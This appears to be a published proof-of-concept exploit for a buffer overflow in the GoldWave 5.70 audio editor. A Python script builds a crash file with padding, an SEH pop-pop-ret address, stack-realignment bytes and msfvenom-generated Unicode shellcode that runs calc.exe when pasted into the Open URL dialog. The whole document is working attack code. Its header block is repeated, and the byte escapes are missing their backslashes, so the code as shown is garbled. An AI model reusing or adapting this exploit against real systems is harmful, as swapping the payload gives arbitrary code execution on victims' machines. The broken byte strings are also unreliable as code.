# Date: 2020-05-14
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.goldwave.com/
# Version: 5.70# Date: 2020-05-14
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.goldwave.com/
# Version: 5.70
# Download Link: http://goldwave.com//downloads/gwave570.exe
# Tested on: Windows 10 x86
# PoC
# 1. generate crash.txt, copy contents to clipboard
# 2. open gold wave app
# 3. select File, Open URL...
# 4. paste contents from clipboard after 'http://'
# 5. select OK
f = open("crash.txt", "wb")
buf = b""
buf += b"x41" * 1019
buf += b"x71x71" # Unicode NOP
buf += b"xB3x48" # 0x004800b3 | pop ecx, pop ebp, ret
#realigning stack
buf += b"x75" # Unicode NOP
buf += b"x54" # Push ESP
buf += b"x75" # Unicode NOP
buf += b"x58" # POP EAX
buf += b"x75" # Unicode NOP
buf += b"x05xFFx10" # ADD EAX,
buf += b"x75" # Unicode NOP
buf += b"x2dxEAx10" # SUB EAX,
buf += b"x75"
buf += b"x71" * 595
#msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper
BufferRegister=EAX -f python
buf += b"x50x50x59x41x49x41x49x41x49x41x49x41x51"
buf += b"x41x54x41x58x41x5ax41x50x55x33x51x41x44"
buf += b"x41x5ax41x42x41x52x41x4cx41x59x41x49x41"
buf += b"x51x41x49x41x51x41x50x41x35x41x41x41x50"
buf += b"x41x5ax31x41x49x31x41x49x41x49x41x4ax31"
buf += b"x31x41x49x41x49x41x58x41x35x38x41x41x50"
buf += b"x41x5ax41x42x41x42x51x49x31x41x49x51x49"
buf += b"x41x49x51x49x31x31x31x31x41x49x41x4ax51"
buf += b"x49x31x41x59x41x5ax42x41x42x41x42x41x42"
buf += b"x41x42x33x30x41x50x42x39x34x34x4ax42x4b"
buf += b"x4cx59x58x35x32x4bx50x4bx50x4dx30x31x50"
buf += b"x43x59x4bx35x50x31x39x30x42x44x54x4bx50"
buf += b"x50x30x30x54x4bx42x32x4cx4cx54x4bx31x42"
buf += b"x4cx54x54x4bx34x32x4fx38x4cx4fx48x37x50"
buf += b"x4ax4fx36x50x31x4bx4fx36x4cx4fx4cx31x51"
buf += b"x43x4cx4cx42x4ex4cx4fx30x39x31x38x4fx4c"
buf += b"x4dx4dx31x59x37x4ax42x4ax52x42x32x51x47"
buf += b"x34x4bx50x52x4cx50x34x4bx30x4ax4fx4cx54"
buf += b"x4bx30x4cx4ex31x34x38x4bx33x30x48x4bx51"
buf += b"x4ax31x30x51x54x4bx50x59x4dx50x4dx31x5a"
buf += b"x33x44x4bx31x39x4cx58x39x53x4ex5ax30x49"
buf += b"x44x4bx4ex54x34x4bx4dx31x4ax36x4ex51x4b"
buf += b"x4fx36x4cx59x31x38x4fx4cx4dx4bx51x49x37"
buf += b"x4ex58x4bx30x52x55x4bx46x4cx43x43x4dx4c"
buf += b"x38x4fx4bx43x4dx4ex44x42x55x5ax44x30x58"
buf += b"x54x4bx52x38x4ex44x4bx51x59x43x31x56x34"
buf += b"x4bx4cx4cx50x4bx34x4bx50x58x4dx4cx4bx51"
buf += b"x39x43x44x4bx4dx34x44x4bx4bx51x4ax30x35"
buf += b"x39x30x44x4dx54x4dx54x31x4bx51x4bx53x31"
buf += b"x50x59x50x5ax32x31x4bx4fx49x50x31x4fx31"
buf += b"x4fx31x4ax34x4bx4ex32x4ax4bx54x4dx51x4d"
buf += b"x51x5ax4bx51x54x4dx54x45x46x52x4bx50x4d"
buf += b"x30x4bx50x32x30x33x38x4ex51x34x4bx42x4f"
buf += b"x34x47x4bx4fx49x45x57x4bx5ax50x38x35x45"
buf += b"x52x52x36x42x48x37x36x34x55x47x4dx55x4d"
buf += b"x4bx4fx4ax35x4fx4cx4cx46x33x4cx4cx4ax43"
buf += b"x50x4bx4bx39x50x33x45x4dx35x47x4bx50x47"
buf += b"x4ex33x42x52x42x4fx31x5ax4bx50x50x53x4b"
buf += b"x4fx49x45x52x43x53x31x42x4cx53x33x4ex4e"
buf += b"x32x45x34x38x53x35x4bx50x41x41"
buf += b"x44" * (5000 - len(buf))
f.write(buf)
f.close()